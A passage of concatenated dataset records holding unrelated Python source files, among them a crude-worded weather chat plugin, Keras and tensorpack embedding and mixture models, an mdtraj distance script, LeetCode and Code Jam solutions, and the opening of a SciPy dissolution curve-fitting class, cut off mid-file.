table\r\n if not loc:\r\n return fweather.__doc__\r\n loc = loc[0]\r\n\r\n loc, _, state = loc.partition(', ')\r\n\r\n # Check to see if a lat, long pair is being passed. This could be done more\r\n # completely with regex, and converting from DMS to decimal degrees. This\r\n # is nice and simple, however.\r\n try:\r\n float(loc)\r\n float(state)\r\n\r\n loc = loc + ',' + state\r\n state = ''\r\n except ValueError:\r\n if state:\r\n state = http.quote_plus(state)\r\n state += '/'\r\n\r\n loc = http.quote_plus(loc)\r\n\r\n url = 'http://thefuckingweather.com/'\r\n query = '?where={state}{loc}'.format(state=state, loc=loc)\r\n\r\n url += query\r\n\r\n try:\r\n parsed_html = http.get_html(url)\r\n except IOError:\r\n return 'I CAN\\'T PARSE THAT SHIT'\r\n\r\n info = {}\r\n\r\n result = parsed_html.xpath('//p[@class=\"large\"] | //p[@class=\"remark\"] | //p[@class=\"flavor\"]')\r\n\r\n if not len(result):\r\n reply('I CAN\\'T FIND THAT SHIT')\r\n return\r\n\r\n reply(' - '.join([ r.text_content() for r in result ]))\r\n","sub_path":"plugins/obsceneweather.py","file_name":"obsceneweather.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"429845499","text":"import os\nfrom datetime import datetime\n\nimport numpy as np\nfrom keras import Input\nfrom keras.callbacks import TensorBoard\nfrom keras.engine import Model\nfrom keras.layers import LSTM, Dense, Reshape\nfrom keras.optimizers import Adam\n\nfrom topoml_util.GaussianMixtureLoss import GaussianMixtureLoss\nfrom topoml_util.LoggerCallback import EpochLogger\nfrom topoml_util.geom_scaler import localized_normal, localized_mean\nfrom topoml_util.GeoVectorizer import GeoVectorizer\nfrom topoml_util.wkt2pyplot import wkt2pyplot\nfrom topoml_util.slack_send import notify\n\nSCRIPT_VERSION = \"0.0.1\"\nSCRIPT_NAME = os.path.basename(__file__)\nTIMESTAMP = str(datetime.now()).replace(':', '.') # for Windows compat\nSIGNATURE = SCRIPT_NAME + ' ' + TIMESTAMP\nDATA_FILE = '../files/geodata_vectorized.npz'\nBATCH_SIZE = 5122\nTRAIN_VALIDATE_SPLIT = 0.1\nLATENT_SIZE = 128\nEPOCHS = 50\nOPTIMIZER = Adam(lr=1e-3)\n\nNUM_COMPONENTS = 10\n\nloaded = np.load(DATA_FILE)\nraw_training_vectors = loaded['input_geoms']\nraw_target_vectors = loaded['intersection_surface'][:, 0, :]\n\ntraining_vectors = []\ntarget_vectors = []\n\nfor index, target in enumerate(raw_target_vectors):\n if not target[0] == 0: # a zero coordinate designates an empty geometry\n training_vectors.append(raw_training_vectors[index])\n target_vectors.append(raw_target_vectors[index])\n\n\nmeans = localized_mean(training_vectors)\ntraining_vectors = localized_normal(training_vectors, means, 1e4)\n(data_points, max_points, GEO_VECTOR_LEN) = training_vectors.shape\n\ntarget_vectors = np.reshape(target_vectors, (data_points, 1, 2))\n\ninputs = Input(shape=(max_points, GEO_VECTOR_LEN))\nmodel = Dense(64)(inputs)\nmodel = LSTM(LATENT_SIZE, activation='relu')(model)\nmodel = Dense(NUM_COMPONENTS * 3)(model)\nmodel = Reshape((1, NUM_COMPONENTS * 3))(model)\nmodel = Model(inputs, model)\n\nGMM = GaussianMixtureLoss(NUM_COMPONENTS, max_points)\nmodel.compile(loss=GMM.univariate_gmm_loss, optimizer=OPTIMIZER)\nmodel.summary()\n\ntb_callback = TensorBoard(log_dir='./tensorboard_log/' + TIMESTAMP, write_graph=False)\nepoch_callback = EpochLogger(\n input_func=GeoVectorizer.decypher,\n target_func=lambda x: str(x),\n predict_func=lambda x: str(x),\n aggregate_func=None,\n stdout=True\n)\n\nhistory = model.fit(\n x=training_vectors,\n y=np.array(target_vectors),\n epochs=EPOCHS,\n batch_size=BATCH_SIZE,\n validation_split=TRAIN_VALIDATE_SPLIT,\n callbacks=[epoch_callback, tb_callback]).history\n\nprediction = model.predict(training_vectors[0:1000])\nintersecting_error = np.abs(prediction[:, 0] - target_vectors[0:1000, 0])\n\ndecyphered = [GeoVectorizer.decypher(vector).split('\\n') for vector in training_vectors[0:1000]]\nzipped = zip(decyphered, target_vectors[0:1000, 0], prediction[:, 0])\nsorted_results = sorted(zipped, key=lambda record: abs(record[2] - record[1]))\n\nprint('Intersection surface area mean:', np.mean(target_vectors))\nprint('Intersecting error mean:', np.mean(intersecting_error))\n\nplot_samples = 50\nprint('Saving top and bottom', plot_samples, 'results as plots, this will take a few minutes...')\n# print('Worst', plot_samples, 'results: ', sorted_results[-plot_samples:])\nfor result in sorted_results[-plot_samples:]:\n timestamp = str(datetime.now()).replace(':', '.')\n plot, _, ax = wkt2pyplot(result[0])\n plot.text(0.01, 0.06, 'target: ' + str(result[1]), transform=ax.transAxes)\n plot.text(0.01, 0.01, 'prediction: ' + str(result[2]), transform=ax.transAxes)\n plot.savefig('./plot_images/bad_' + 
timestamp + '.png')\n plot.close()\n\n# print('Best', plot_samples, 'results:', sorted_results[0:plot_samples])\nfor result in sorted_results[0:plot_samples]:\n timestamp = str(datetime.now()).replace(':', '.')\n plot, _, ax = wkt2pyplot(result[0])\n plot.text(0.01, 0.06, 'target: ' + str(result[1]), transform=ax.transAxes)\n plot.text(0.01, 0.01, 'prediction: ' + str(result[2]), transform=ax.transAxes)\n plot.savefig('./plot_images/good_' + timestamp + '.png')\n plot.close()\n\nnotify(TIMESTAMP, SCRIPT_NAME, 'validation loss of ' + str(history['val_loss'][-1]))\nprint(SCRIPT_NAME, 'finished successfully')\n","sub_path":"model/intersection_surface_gmm.py","file_name":"intersection_surface_gmm.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"177664287","text":"# initialize\nimport glob\nimport numpy as np\nimport mdtraj as md\n\ntopFile = 'csrc_inactive.pdb'\ntop = md.load(topFile).topology\n\n# select the atoms\na1 = top.select('name CD and resid 50 and resname GLU')\nb1 = top.select('name NZ and resid 35 and resname LYS')\n\na2 = a1\nb2 = top.select('name CZ and resid 149 and resname ARG')\npairs = [[a1[0],b1[0]],[a2[0],b2[0]]]\n\n\n# calculate\nfor file in glob.glob('*/*.lh5'):\n\tprint(file)\n\tt = md.load(file)\n\t# distances\n\tdist1 = md.compute_distances(t,pairs)\n\tnp.save(file.replace('.lh5','_KE-RE.npy'), dist1)\n \n \n#### for Gens\nre = [delta[i][1] for i in range(2000)]\nke = [delta[i][0] for i in range(2000)]\nnp.save('Gens_KE.npy', ke)\nnp.save('Gens_RE.npy', re)\n\n#### for Monte Carlo trajectory\nimport glob\nimport numpy as np\nimport mdtraj as md\n\nfile = 'MSM_traj_csrc_100microsecs.pdb'\ntrj = md.load(file)\ntop = trj.topology\n\na1 = top.select('name CD and resid 50 and resname GLU')\nb1 = top.select('name NZ and resid 35 and resname LYS')\n\na2 = a1\nb2 = top.select('name CZ and resid 149 and resname ARG')\n\npairs = [[a1[0],b1[0]],[a2[0],b2[0]]]\ndist2 = md.compute_distances(t,pairs)\nre = [dist2[i][1] for i in range(trj.n_frames)]\nke = [dist2[i][0] for i in range(trj.n_frames)]\n\nnp.save('MSM_traj_csrc_100microsecs_KE.npy', ke)\nnp.save('MSM_traj_csrc_100microsecs_RE.npy', re)\n\n\n\n","sub_path":"MDSimulation/Src/buildMSM/distances.py","file_name":"distances.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"410091665","text":"# https://discuss.leetcode.com/topic/27844/ac-python-dp-solutioin-120ms-based-on-largest-rectangle-in-histogram/2\nclass Solution:\n def maximalRectangle0(self, matrix):\n if not matrix or not matrix[0]:\n return 0\n n = len(matrix[0])\n height = [0] * (n + 1)\n ans = 0\n for row in matrix:\n for i in range(n):\n height[i] = height[i] + 1 if row[i] == '1' else 0\n stack = [-1]\n for i in range(n + 1):\n while height[i] < height[stack[-1]]:\n h = height[stack.pop()]\n w = i - 1 - stack[-1]\n ans = max(ans, h * w)\n stack.append(i)\n return ans\n\n def largestRectangleArea(self, height):\n height.append(0)\n ans = 0\n stack = []\n for i in range(len(height)):\n while len(stack) > 0 and height[i] < height[stack[-1]]:\n h = height[stack.pop()]\n sidx = stack[-1] if len(stack) > 0 else -1\n w = i - sidx - 1\n ans = max(ans, h * w)\n stack.append(i)\n return ans\n\n def maximalRectangle(self, matrix):\n if len(matrix) == 0:\n return 0\n height = [0 for _ in range(len(matrix[0]))]\n maxRect = 0\n for i in range(len(matrix)):\n for j in range(len(height)):\n if matrix[i][j] == '0':\n height[j] = 0\n else:\n height[j] += 1\n maxRect = max(maxRect, self.largestRectangleArea(height))\n height.pop()\n return maxRect\n\n def nextExceed(self, input):\n result = [-1 for _ in range(len(input))]\n monoStack = []\n for i in range(len(input)):\n while len(monoStack) != 0 and input[monoStack[-1]] < input[i]:\n result[monoStack[-1]] = i - monoStack[-1]\n monoStack.pop()\n monoStack.append(i)\n\n return result\n\n\nif __name__ == '__main__':\n sol = Solution()\n\n # print(sol.maximalRectangle([\"10100\", \"10111\", \"11111\", \"10010\"]))\n print(sol.nextExceed([5, 3, 1, 2, 4]))\n","sub_path":"Solutions/085. Maximal Rectangle/085.py","file_name":"085.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"475669740","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: mnist-embeddings.py\n# Author: PatWie \nimport numpy as np\nimport os\n\nfrom tensorpack import *\nimport tensorpack.tfutils.symbolic_functions as symbf\nfrom tensorpack.tfutils.summary import add_moving_summary\nimport argparse\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport random\n\nfrom spatial_relations_bb_data import get_test_data, DatasetPairs, DatasetTriplets\n\nembed_dim = 2\noptimizer = \"SGD\"\nlearning_rate = 1e-3\n\nMATPLOTLIB_AVAIBLABLE = False\ntry:\n import matplotlib\n from matplotlib import offsetbox\n import matplotlib.pyplot as plt\n import matplotlib.cm as cm\n import matplotlib.patches as mpatches\n plt.switch_backend('agg')\n MATPLOTLIB_AVAIBLABLE = True\nexcept ImportError:\n MATPLOTLIB_AVAIBLABLE = False \n\nclass EmbeddingModel(ModelDesc):\n global embed_dim\n global optimizer\n def embed(self, x, b, nfeatures=embed_dim):\n\n \"\"\"Embed all given tensors into an nfeatures-dim space. \"\"\"\n list_split = 0\n if isinstance(x, list):\n list_split = len(x)\n x = tf.concat(x, 0)\n\n print('Printing x..')\n print(x.get_shape())\n # pre-process MNIST dataflow data\n #x = tf.expand_dims(x, 3)\n #x = x * 2 - 1\n\n # the embedding network\n #net = slim.layers.conv2d(x, 20, 5, scope='conv1')\n #net = slim.layers.max_pool2d(net, 2, scope='pool1')\n #net = slim.layers.conv2d(net, 50, 5, scope='conv2')\n #net = slim.layers.max_pool2d(net, 2, scope='pool2')\n #net = slim.layers.flatten(net, scope='flatten3')\n #net = slim.layers.fully_connected(net, 500, scope='fully_connected4')\n #embeddings = slim.layers.fully_connected(net, nfeatures, activation_fn=None, scope='fully_connected5')\n #i = 0\n #for img,bb in zip(x,b):\n with slim.arg_scope([slim.layers.fully_connected], weights_regularizer=slim.l2_regularizer(1e-5)):\n net = slim.layers.conv2d(x, 64, [3, 3], scope='conv1')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool1')\n net = slim.layers.conv2d(net, 128, [3, 3], scope='conv2')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool2')\n net = slim.layers.conv2d(net, 256, [3, 3], scope='conv3')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool3')\n net = slim.layers.conv2d(net, 512, [3, 3], scope='conv4')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool4')\n net = slim.layers.conv2d(net, 512, [3, 3], scope='conv5')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool5')\n net = slim.layers.flatten(net, scope='flatten5')\n net = slim.layers.fully_connected(net, 4096, scope='fc6')\n print('Printing fc shape...')\n print(net.get_shape())\n if list_split > 0:\n fc6_embed = tf.split(net, list_split, 0)\n bb_float = tf.cast(b, tf.float32)\n net = tf.concat(axis=2, values=[fc6_embed,bb_float])\n print('Printing multi bb shape..')\n print(net.get_shape())\n\n #net = tf.split(net,list_split,axis=0)\n #for j in range(list_split):\n #net = tf.squeeze(net)\n #net = tf.concat([tf.squeeze(net_el) for net_el in net], 0)\n net = tf.reshape(net,[tf.shape(net)[1]*list_split,4104])\n print('Printing reshaped..')\n print(net.get_shape())\n else:\n bb_float = tf.cast(b, tf.float32)\n net = tf.concat(axis=1, values=[net,bb_float])\n print('Printing single bb shape..')\n print(net.get_shape())\n \n net = slim.layers.dropout(net, 0.5, scope='dropout6')\n net = slim.layers.fully_connected(net, 4096, scope='fc7')\n net = slim.layers.dropout(net, 0.5, scope='dropout7')\n #try:\n # _ = embeddings.shape\n # embeddings = np.array(embeddings, 
slim.layers.fully_connected(net, nfeatures, activation_fn=None, scope='fc8_'+str(i)))\n #except:\n embeddings = slim.layers.fully_connected(net, nfeatures, activation_fn=None, scope='fc8')\n \n #i = i + 1\n\n # if \"x\" was a list of tensors, then split the embeddings\n if list_split > 0:\n embeddings = tf.split(embeddings, list_split, 0)\n\n return embeddings\n\n def _get_optimizer(self):\n global learning_rate\n lr = symbf.get_scalar_var('learning_rate', learning_rate, summary=True)\n if optimizer=='SGD':\n return tf.train.GradientDescentOptimizer(lr)\n elif optimizer=='Adam':\n return tf.train.AdamOptimizer(lr)\n elif optimizer=='Momentum':\n return tf.train.MomentumOptimizer(lr)\n elif optimizer=='RMSProp':\n return tf.train.RMSPropOptimizer(lr, momentum=0.5)\n\n\nclass SiameseModel(EmbeddingModel):\n @staticmethod\n def get_data():\n ds = DatasetPairs('data/genome_train.json','train')\n ds = AugmentImageComponent(ds, [imgaug.Resize((224, 224))])\n ds = BatchData(ds, 64 // 2)\n return ds\n\n def _get_inputs(self):\n return [InputDesc(tf.float32, (None, 224, 224), 'input'),\n InputDesc(tf.int32, (None, 8), 'bb'),\n InputDesc(tf.float32, (None, 224, 224), 'input_y'),\n InputDesc(tf.int32, (None, 8), 'bb_y'),\n InputDesc(tf.int32, (None,), 'label')]\n\n def _build_graph(self, inputs):\n # get inputs\n img_x, bb_x, img_y, bb_y, label = inputs\n # embed them\n x_embed, y_embed = self.embed([img_x, img_y], [bb_x, bb_y])\n\n # tag the embedding of 'input' with name 'emb', just for inference later on\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n tf.identity(self.embed(inputs[0]), name=\"emb\")\n\n # compute the actual loss\n cost, pos_dist, neg_dist = symbf.contrastive_loss(x_embed, y_embed, label, 5., extra=True, scope=\"loss\")\n self.cost = tf.identity(cost, name=\"cost\")\n\n # track these values during training\n add_moving_summary(pos_dist, neg_dist, self.cost)\n\n\nclass CosineModel(SiameseModel):\n def _build_graph(self, inputs):\n x, y, label = inputs\n img_x. 
bb_x = x\n img_y, bb_y = y\n x_embed, y_embed = self.embed([img_x, img_y], [bb_x, bb_y])\n\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n tf.identity(self.embed(inputs[0], inputs[1]), name=\"emb\")\n\n cost = symbf.siamese_cosine_loss(x_embed, y_embed, label, scope=\"loss\")\n self.cost = tf.identity(cost, name=\"cost\")\n add_moving_summary(self.cost)\n\n\nclass TripletModel(EmbeddingModel):\n @staticmethod\n def get_data():\n ds = DatasetTriplets('data/genome_train.json','train')\n ds = AugmentImageComponent(ds, [imgaug.Resize((224, 224))])\n ds = BatchData(ds, 64 // 3)\n return ds\n\n def _get_inputs(self):\n return [InputDesc(tf.float32, (None, 224, 224, 3), 'input'),\n InputDesc(tf.int32, (None, 8), 'bb'),\n InputDesc(tf.float32, (None, 224, 224, 3), 'input_p'),\n InputDesc(tf.int32, (None,8), 'bb_p'),\n InputDesc(tf.float32, (None, 224, 224, 3), 'input_n'),\n InputDesc(tf.int32, (None, 8), 'bb_n')\n ]\n\n def loss(self, a, p, n):\n return symbf.triplet_loss(a, p, n, 5., extra=True, scope=\"loss\")\n\n def _build_graph(self, inputs):\n global embed_dim\n print(len(inputs))\n img_a, bb_a, img_p, bb_p, img_n, bb_n = inputs\n # scaling the bb coordinates wrt image\n bb_a = tf.scalar_mul(224,bb_a)\n bb_p = tf.scalar_mul(224,bb_p)\n bb_n = tf.scalar_mul(224,bb_n)\n a_embed, p_embed, n_embed = self.embed([img_a, img_p, img_n,], [bb_a, bb_p, bb_n], embed_dim)\n\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n tf.identity(self.embed(inputs[0], inputs[1], embed_dim), name=\"emb\")\n\n print('Printing shape of embeddings..')\n print(a_embed.get_shape())\n print(p_embed.get_shape())\n cost, pos_dist, neg_dist = self.loss(a_embed, p_embed, n_embed)\n\n self.cost = tf.identity(cost, name=\"cost\")\n add_moving_summary(pos_dist, neg_dist, self.cost)\n\n\nclass SoftTripletModel(TripletModel):\n def loss(self, a, p, n):\n return symbf.soft_triplet_loss(a, p, n, scope=\"loss\")\n\n\ndef get_config(model, algorithm_name):\n\n extra_display = [\"cost\"]\n if not algorithm_name == \"cosine\":\n extra_display = extra_display + [\"loss/pos-dist\", \"loss/neg-dist\"]\n\n return TrainConfig(\n dataflow=model.get_data(),\n model=model(),\n callbacks=[\n ModelSaver(max_to_keep=20, keep_checkpoint_every_n_hours=2)#,\n #ScheduledHyperParamSetter('learning_rate', [(75, 1e-4), (150, 1e-5), (300,1e-6)])\n ],\n extra_callbacks=[\n MovingAverageSummary(),\n ProgressBar(extra_display),\n MergeAllSummaries(),\n RunUpdateOps()\n ],\n max_epoch=400,\n )\n\n\ndef visualize(model_path, model, algo_name):\n if not MATPLOTLIB_AVAIBLABLE:\n logger.error(\"visualize requires matplotlib package ...\")\n return\n pred = OfflinePredictor(PredictConfig(\n session_init=get_model_loader(model_path),\n model=model(),\n input_names=['input','bb'],\n output_names=['emb']))\n\n NUM_BATCHES = 6\n BATCH_SIZE = 64\n #images = np.zeros((BATCH_SIZE * NUM_BATCHES, 224, 224)) # the used digits\n embed = np.zeros((BATCH_SIZE * NUM_BATCHES, 2)) # the actual embeddings in 2-d\n labels = np.zeros((BATCH_SIZE * NUM_BATCHES)) # true labels\n\n # get only the embedding model data (genome test)\n ds = get_test_data('data/genome_test.json')\n ds.reset_state()\n\n for offset, dp in enumerate(ds.get_data()):\n img, bb, label = dp\n \n #TODO: verify input format\n prediction = pred([img, bb])[0]\n embed[offset * BATCH_SIZE:offset * BATCH_SIZE + BATCH_SIZE, ...] = prediction\n # TODO: enumerate label and color it accordingly\n #images[offset * BATCH_SIZE:offset * BATCH_SIZE + BATCH_SIZE, ...] 
= img\n labels[offset * BATCH_SIZE:offset * BATCH_SIZE + BATCH_SIZE, ...] = label\n offset += 1\n if offset == NUM_BATCHES: \n break\n\n print('MATPLOTLIB_AVAILABLE: '+str(MATPLOTLIB_AVAIBLABLE))\n plt.ioff()\n fig = plt.figure()\n ax = plt.subplot(111)\n ax_min = np.min(embed, 0)\n ax_max = np.max(embed, 0)\n\n ax_dist_sq = np.sum((ax_max - ax_min)**2)\n ax.axis('off')\n\n # dictionary of labels\n relation_labels = {0:'at', 1:'along', 2:'across', 3:'near/beside', 4:'around', 5:'on top of', 6:'side of', 7:'in/inside', \n 8:'over', 9:'left of', 10:'under/below', 11:'by', 12:'bottom', 13:'outside', 14:'on', 15:'right of'}\n circles = []\n classes = []\n\n # total number of labels\n N = 16\n # define the colormap\n cmap = plt.cm.jet\n # extract all colors from the .jet map\n cmaplist = [cmap(i) for i in range(cmap.N)]\n # create the new map\n cmap = cmap.from_list('Custom cmap', cmaplist, cmap.N)\n\n x = np.arange(N)\n ys = [i+x+(i*x)**2 for i in range(N)]\n #c = cm.rainbow(np.linspace(0, 1, len(ys)))\n c = ['r','b', 'c', 'g','yellow','blueviolet','lightblue','darkgreen','orange','mediumvioletred','lightcoral',\n 'olive','brown','dimgray','steelblue','k']\n\n for i in relation_labels:\n circles.append(mpatches.Circle((0,0),1,color=c[i]))\n classes.append(relation_labels[i])\n\n shown_images = np.array([[1., 1.]])\n for i in range(embed.shape[0]):\n dist = np.sum((embed[i] - shown_images)**2, 1)\n if np.min(dist) < 3e-4 * ax_dist_sq: # don't show points that are too close\n continue\n \n shown_images = np.r_[shown_images, [embed[i]]]\n # TODO: colored circle according to label\n plt.scatter(embed[i][0], embed[i][1], color=c[int(labels[i])])\n #imagebox = offsetbox.AnnotationBbox(offsetbox.OffsetImage(np.reshape(images[i, ...], [224, 224]),zoom=0.6, cmap=plt.cm.gray_r), xy=embed[i], frameon=False)\n #ax.add_artist(imagebox)\n\n plt.axis([ax_min[0]*2, ax_max[0]*2, ax_min[1]*2, ax_max[1]*2])\n plt.xticks([]), plt.yticks([])\n plt.legend(circles, classes, loc='lower left')\n plt.title('Embedding using %s-loss' % algo_name)\n plt.savefig('%s.jpg' % algo_name)\n plt.close(fig)\n\ndef evaluate_random(model_path, model, algo_name):\n global embed_dim\n ensemble_size = 15\n correct = 0\n total = 0\n BATCH_SIZE = 64\n #NUM_BATCHES = 50000\n\n pred = OfflinePredictor(PredictConfig(\n session_init=get_model_loader(model_path),\n model=model(),\n input_names=['input','bb'],\n output_names=['emb']))\n\n # get train data\n dt = get_test_data('data/genome_train.json')\n dt.reset_state()\n print('loaded training data')\n\n train_data = {}\n for offset,dp in enumerate(dt.get_data()):\n #print(offset)\n img, bb, label = dp\n prediction = pred([img, bb])\n embedding = prediction[0]\n for i in range(BATCH_SIZE):\n gt = label[i]\n if gt not in train_data:\n train_data[gt] = [embedding[i]]\n else:\n train_data[gt].append(embedding[i])\n offset += 1\n #if offset == NUM_BATCHES:\n # break\n\n total_tr_data = 0 \n for label in train_data:\n print(str(label) + ': '+ str(len(train_data[label])))\n total_tr_data += len(train_data[label])\n print('total training data: ' + str(total_tr_data))\n\n ds = get_test_data('data/genome_test.json')\n ds.reset_state()\n print('loaded test data')\n\n for dp in ds.get_data():\n img, bb, label = dp\n embed_test_batch = pred([img, bb])[0]\n dist = {}\n for i in range(BATCH_SIZE):\n embed_test = embed_test_batch[i]\n # choose an image randomly from every class\n for l in train_data:\n dist[l] = 0\n r = random.sample(range(0,len(train_data[l])), ensemble_size)\n for sample in r:\n dist[l] 
+= np.linalg.norm(embed_test-train_data[l][sample])\n dist[l] = dist[l]/ensemble_size\n\n min_value = min(dist.itervalues())\n min_keys = [k for k in dist if dist[k] == min_value]\n\n if len(min_keys)==1:\n pred_class = min_keys[0]\n else:\n pred_class = min_keys[random.randint(0,len(min_keys)-1)]\n\n if pred_class == label[i]:\n correct += 1\n total += 1\n\n return correct, total\n\n \n\nif __name__ == '__main__':\n global embed_dim\n global optimizer\n global learning_rate\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n parser.add_argument('--load', help='load model')\n parser.add_argument('-a', '--algorithm', help='used algorithm', type=str,\n choices=[\"siamese\", \"cosine\", \"triplet\", \"softtriplet\"])\n parser.add_argument('--visualize', help='export embeddings into an image', action='store_true')\n parser.add_argument('--dim', help='dimensionality of the embedding space', type=int)\n parser.add_argument('--evaluate', help = 'compute accuracy', action='store_true')\n parser.add_argument('--modelname', help = 'model directory name', type=str)\n parser.add_argument('--optimizer', help = 'Optimizer', type=str)\n parser.add_argument('--lr', help='learning rate', type=float)\n args = parser.parse_args()\n\n ALGO_CONFIGS = {\"siamese\": SiameseModel,\n \"cosine\": CosineModel,\n \"triplet\": TripletModel,\n \"softtriplet\": SoftTripletModel}\n\n if args.modelname:\n logger.auto_set_dir(name=args.modelname)\n else:\n logger.auto_set_dir(name=args.algorithm)\n #logger.auto_set_dir(name='softtriplet0830-145950')\n\n if args.dim:\n embed_dim = args.dim\n\n if args.optimizer:\n optimizer = args.optimizer\n\n if args.lr:\n learning_rate = args.lr\n\n with change_gpu(args.gpu):\n if args.visualize:\n visualize(args.load, ALGO_CONFIGS[args.algorithm], args.algorithm)\n elif args.evaluate:\n correct, total = evaluate_random(args.load, ALGO_CONFIGS[args.algorithm], args.algorithm)\n print('accuracy: '+str(float(correct)*100/total) + '% = ' + str(correct) + '/' +str(total))\n else:\n config = get_config(ALGO_CONFIGS[args.algorithm], args.algorithm)\n if args.load:\n config.session_init = SaverRestore(args.load)\n SimpleTrainer(config).train()\n else:\n SimpleTrainer(config).train()\n","sub_path":"examples/SimilarityLearning/spatial-relation-bb-embeddings.py","file_name":"spatial-relation-bb-embeddings.py","file_ext":"py","file_size_in_byte":17210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
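The `evaluate_random` routine above classifies a test embedding by its mean distance to a random sample from each class and picks the argmin. A self-contained NumPy sketch of that decision rule (synthetic clusters stand in for the learned embeddings, and the tie-breaking branch is omitted):

```python
import numpy as np

rng = np.random.default_rng(0)

def predict_class(query, class_embeddings, ensemble_size=3):
    """Mean distance to a random sample of each class's embeddings; argmin wins."""
    scores = {}
    for label, embs in class_embeddings.items():
        idx = rng.choice(len(embs), size=min(ensemble_size, len(embs)), replace=False)
        scores[label] = np.mean([np.linalg.norm(query - embs[i]) for i in idx])
    return min(scores, key=scores.get)

train = {0: rng.normal(0, 0.1, (20, 2)), 1: rng.normal(3, 0.1, (20, 2))}
print(predict_class(np.array([2.9, 3.1]), train))  # 1
```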
+{"seq_id":"403575491","text":"import sys\r\ni = open(\"input.txt\",\"r\")\r\no = open(\"output.txt\",\"w\")\r\n\r\ndef main():\r\n \r\n nCases = int(i.readline())\r\n output = []\r\n for case in range(nCases):\r\n nrow = int(i.readline())\r\n row = []\r\n for no in range(4):\r\n row.append(map(int,i.readline().split()))\r\n \r\n\r\n prow = int(i.readline())\r\n pnrow = []\r\n for no in range(4):\r\n pnrow.append(map(int,i.readline().split()))\r\n count = 0\r\n list = []\r\n for numbers in row[nrow - 1]:\r\n for nextnumbers in pnrow[prow - 1]:\r\n if numbers == nextnumbers:\r\n count+=1\r\n list.append(numbers)\r\n if count == 0:\r\n output.append(\"Case #\"+str(case+1)+\": Volunteer cheated!\")\r\n \r\n elif count == 1:\r\n output.append(\"Case #\"+str(case+1)+\": \"+str(list[0]))\r\n else:\r\n output.append(\"Case #\"+str(case+1)+\": Bad magician!\")\r\n\r\n for case in range(nCases):\r\n #print output[case]\r\n o.write(\"{0}\\n\".format(output[case]))\r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n try:\r\n import psyco\r\n psyco.full()\r\n except ImportError:\r\n pass \r\n main()\r\n i.close()\r\n o.close()\r\n\r\n","sub_path":"solutions_python/Problem_135/1989.py","file_name":"1989.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"37914487","text":"import sys\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import curve_fit\nfrom scipy.signal import savgol_filter\n\n\nclass DissolutionFitting(object):\n \"\"\"\n Dissolution fitting class\n \"\"\"\n def __init__(self,\n length, nx,\n nt,\n c_a0, c_ea0, c_t0, c_eae0, c_et0,\n c_a_boundary,\n rho, p_gel, nu, d_a,\n exp_times, exp_mass):\n \"\"\"\n constructor for dissolution simulation\n :param length: side length of cubic specimen\n :param nx: number of grid points\n :param nt: number of time steps\n :param c_a0: initial condition\n :param c_ea0: initial condition\n :param c_t0: initial condition\n :param c_eae0: initial condition\n :param c_et0: initial condition\n :param c_a_boundary: boundary condition\n :param rho: polymer density\n :param p_gel: polymer gel point\n :param nu: free volume\n :param d_a: diffusion coefficient\n :param exp_times: experimental times\n :param exp_mass: experimental mass\n \"\"\"\n self.length = length\n self.nx = nx\n self.nt = nt\n\n self.c_a0 = c_a0\n self.c_ea0 = c_ea0\n self.c_t0 = c_t0\n self.c_eae0 = c_eae0\n self.c_et0 = c_et0\n\n self.c_a_boundary = c_a_boundary\n\n self.rho = rho\n self.p_gel = p_gel\n self.nu = nu\n self.d_a = d_a\n\n self.exp_times = exp_times[~np.isnan(exp_times)]\n self.exp_mass = exp_mass[~np.isnan(exp_mass)]\n\n self.smooth_exp_times, self.smooth_exp_mass = self.smooth_experimental_data()\n\n # code for curve fitting goes here\n #\n bounds = (0.0, 1e-11)\n popt, pcov = curve_fit(self.func,\n self.smooth_exp_times, self.smooth_exp_mass,\n bounds=bounds, verbose=2)\n\n self.popt = popt\n self.pcov = pcov\n\n self.fitted_mass = self.func(self.smooth_exp_times, *popt)\n self.times_plot, self.masses_plot = self.results_for_plots()\n\n def results_for_plots(self):\n \"\"\"\n\n :return:\n \"\"\"\n s = interp1d(self.smooth_exp_times, self.fitted_mass,\n kind='cubic')\n times = self.exp_times\n masses = s(times)\n return times, masses\n\n def smooth_experimental_data(self):\n \"\"\"\n smooth experimental data\n :return: smoothed experimental time and mass arrays\n \"\"\"\n s = interp1d(self.exp_times, self.exp_mass,\n kind='cubic')\n times = np.linspace(0.0, np.max(self.exp_times),\n num=self.nt)\n masses = s(times)\n return times, masses\n\n def func(self, times, k0):\n \"\"\"\n function for curve fitting\n :param times: smoothed experimental times\n :param k0: reaction rate constant\n :return: the results of func_inner\n \"\"\"\n return self.func_inner(times, k0)\n\n def func_inner(self, times, k0):\n \"\"\"\n inner function\n :param times: smoothed experimental times\n :param k0: reaction rate constant\n :return: the results of the mass array from a dissolution simulation\n \"\"\"\n time_last = np.max(times)\n\n # call dissolution object here\n #\n d = Dissolution(self.length, self.nx,\n time_last, self.nt,\n self.c_a0, self.c_ea0, self.c_t0, self.c_eae0, self.c_et0,\n self.c_a_boundary,\n self.rho, self.p_gel, self.nu, self.d_a, k0)\n\n return d.mass\n\n\nclass 